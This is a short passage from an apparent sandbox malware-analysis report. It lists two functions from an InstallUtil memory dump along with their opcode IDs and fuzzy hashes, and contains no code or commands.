                                                              Function 029F5EB0 Relevance: .0, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 548af1bedb1a3876e30322c870a2e5e6843f1f35942d9feca3fa37ed1801e55a
                                                              • Instruction ID: e9815707f4e78366ab483ccd3a708850829ff8db923cbac3040fa23674ffad97
                                                              • Opcode Fuzzy Hash: 548af1bedb1a3876e30322c870a2e5e6843f1f35942d9feca3fa37ed1801e55a
                                                              • Instruction Fuzzy Hash: EFD01230A482454BCB06F774FB568143B25AF81308B5545A5A4454B43BEFB84C4D8751
                                                              Function 029F5EC0 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.4495638820.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_29f0000_InstallUtil.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: adb598e14cab535f89e7e04943f4b6f80013b0a4a82b33369d68019297b881fd
                                                              • Instruction ID: d20f5e4b8c3e187dda49077630d92ffbc1c1c4354f265f937eab5e5cdf863e4f
                                                              • Opcode Fuzzy Hash: adb598e14cab535f89e7e04943f4b6f80013b0a4a82b33369d68019297b881fd
                                                              • Instruction Fuzzy Hash: 07C012309443094BC549FB75FB46D15775EAEC0308F505920B40A0752EFFB89D4D8690